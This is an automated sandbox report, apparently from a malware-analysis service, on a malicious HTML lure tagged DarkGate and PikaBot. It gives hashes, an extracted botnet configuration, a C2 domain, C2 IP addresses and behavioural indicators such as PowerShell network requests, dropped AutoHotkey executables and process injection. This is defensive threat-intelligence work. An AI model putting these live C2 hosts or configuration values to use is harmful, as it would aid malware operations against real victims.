darkgate | 196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005

Analysis

max time kernel
358s
max time network
325s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
26-03-2024 15:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

march26.html
Size

3KB
MD5

ace67f099683c4360f442c58da66aeba
SHA1

2b90f1398b79331e8f853ddb004dcc87a1daf540
SHA256

196bb36f7d63c845afd40c5c17ce061e320d110f28ebe8c7c998b9e6b3fe1005
SHA512

02e2465e10ee581b04896dd77ee906542786b7662071befa9b6c07fca00862be063516030045fb29fdec1a68108aaf93cc30db24cd329776b1d316c9d7ca7073

Score

10^/10

darkgate pikabot admin888 botnet stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

withupdate.com

Attributes

anti_analysis
true
anti_debug
false
anti_vm
true
c2_port
80
check_disk
false
check_ram
false
check_xeon
false
crypter_au3
false
crypter_dll
false
crypter_raw_stub
false
internal_mutex
VqunyHFY
minimum_disk
50
minimum_ram
4000
ping_interval
6
rootkit
false
startup_persistence
true
username
admin888

Extracted

Family

pikabot

158.220.95.214

172.232.208.90

194.233.91.144

158.220.95.215

84.247.157.112

Signatures

DarkGate
DarkGate is an infostealer written in C++.
stealer darkgate

Detect DarkGate stealer 6 IoCs

resource	yara_rule
behavioral1/memory/1688-283-0x00000000028A0000-0x0000000002913000-memory.dmp	family_darkgate_v6
behavioral1/memory/1688-285-0x00000000028A0000-0x0000000002913000-memory.dmp	family_darkgate_v6
behavioral1/memory/3612-310-0x0000000002D00000-0x0000000002D73000-memory.dmp	family_darkgate_v6
behavioral1/memory/3612-312-0x0000000002D00000-0x0000000002D73000-memory.dmp	family_darkgate_v6
behavioral1/memory/1280-371-0x0000000002D80000-0x0000000002DF3000-memory.dmp	family_darkgate_v6
behavioral1/memory/1280-373-0x0000000002D80000-0x0000000002DF3000-memory.dmp	family_darkgate_v6

PikaBot
PikaBot is a botnet that is distributed similarly to Qakbot and written in c++.
botnet pikabot

Blocklisted process makes network request 20 IoCs

flow	pid	Process
31	4280	powershell.exe
32	4280	powershell.exe
34	4280	powershell.exe
35	4280	powershell.exe
46	2356	powershell.exe
47	3588	powershell.exe
48	3588	powershell.exe
49	2356	powershell.exe
50	2356	powershell.exe
51	3588	powershell.exe
52	3588	powershell.exe
53	2356	powershell.exe
54	4964	powershell.exe
55	4964	powershell.exe
56	4964	powershell.exe
57	4964	powershell.exe
61	2356	powershell.exe
62	2356	powershell.exe
63	2356	powershell.exe
65	2356	powershell.exe

Executes dropped EXE 5 IoCs

pid	Process
1608	AutoHotkey.exe
1688	AutoHotkey.exe
3612	AutoHotkey.exe
1280	AutoHotkey.exe
4884	AutoHotkey.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 344 set thread context of 4152	344	00.exe	125

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	AutoHotkey.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AutoHotkey.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133559395709783192"	chrome.exe

Modifies registry class 58 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 3100c301c55c5c3137302e3133302e35352e3133305c7368617265004d6963726f736f6674204e6574776f726b000002000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\CachedOfflineAvailableTime = "240624875"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\NodeSlot = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\0 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\0\MRUListEx = ffffffff	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 03000000000000000100000002000000ffffffff	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000100000002000000ffffffff	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}"	Notepad.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\CachedOfflineAvailable = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\0\NodeSlot = "4"	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f580d1a2cf021be504388b07367fc96ef3c0000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = bf000000b900bbaf933bab000400000000002d000000315350537343e50abe43ad4f85e469dc8633986e110000000b000000000b000000ffff0000000000004d0000003153505330f125b7ef471a10a5f102608c9eebac310000000a000000001f0000000f0000003100370030002e003100330030002e00350035002e0031003300300000000000000000002d000000315350533aa4bddeb337834391e74498da2995ab1100000003000000001300000000000000000000000000000000000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\0	Notepad.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\3\MRUListEx = 00000000ffffffff	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Notepad.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings	Notepad.exe
Key created	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Notepad.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Notepad.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4460	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2380	chrome.exe
2380	chrome.exe
4280	powershell.exe
4280	powershell.exe
4280	powershell.exe
1800	chrome.exe
1800	chrome.exe
2356	powershell.exe
2356	powershell.exe
2356	powershell.exe
3588	powershell.exe
3588	powershell.exe
3588	powershell.exe
4964	powershell.exe
4964	powershell.exe
4964	powershell.exe
2356	powershell.exe
2356	powershell.exe
2356	powershell.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe
344	00.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
344	00.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
344	00.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe
Token: SeShutdownPrivilege	2380	chrome.exe
Token: SeCreatePagefilePrivilege	2380	chrome.exe

Suspicious use of FindShellTrayWindow 28 IoCs

pid	Process
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
4884	AutoHotkey.exe
4884	AutoHotkey.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
2380	chrome.exe
4884	AutoHotkey.exe
4884	AutoHotkey.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1904	Notepad.exe
1904	Notepad.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 204	2380	chrome.exe	75
PID 2380 wrote to memory of 204	2380	chrome.exe	75
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 4576	2380	chrome.exe	77
PID 2380 wrote to memory of 1500	2380	chrome.exe	78
PID 2380 wrote to memory of 1500	2380	chrome.exe	78
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79
PID 2380 wrote to memory of 3684	2380	chrome.exe	79

Views/modifies file attributes 1 TTPs 5 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4856	attrib.exe
4660	attrib.exe
1388	attrib.exe
3720	attrib.exe
4564	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\march26.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fffbae69758,0x7fffbae69768,0x7fffbae69778
  2⤵
  PID:204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:2
  2⤵
  PID:4576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1836 --field-trial-handle=1764,i,17634529086500793215,12342472557165387866,131072 /prefetch:8
  2⤵
  PID:1500
